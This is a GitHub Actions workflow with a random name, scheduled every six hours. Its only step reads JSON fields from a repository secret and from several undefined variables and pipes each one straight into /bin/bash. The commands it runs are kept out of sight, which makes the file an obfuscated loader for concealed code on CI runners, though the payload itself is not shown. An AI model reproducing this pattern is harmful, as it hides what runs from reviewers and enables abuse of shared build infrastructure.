name: ghaudhl
on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ghaudhl
        env:
          y57: ${{ secrets.y57 }}
        run: |
          echo $y57 | jq -r .f0740 | /bin/bash
          echo $hq20 | jq -r .uyxfj3 | /bin/bash
          echo $ascq580 | jq -r .nxcto2865 | /bin/bash
          echo $een54 | jq -r .pcg3194 | /bin/bash
          echo $trpgg02 | jq -r .xub8100 | /bin/bash
          echo $lrned74 | jq -r .bgj565 | /bin/bash
          echo $ayj94368 | jq -r .ctft0493 | /bin/bash
          echo $cdv557 | jq -r .okr07 | /bin/bash
          echo $zbyh30256 | jq -r .ua512 | /bin/bash
          echo $p821 | jq -r .npvg597 | /bin/bash

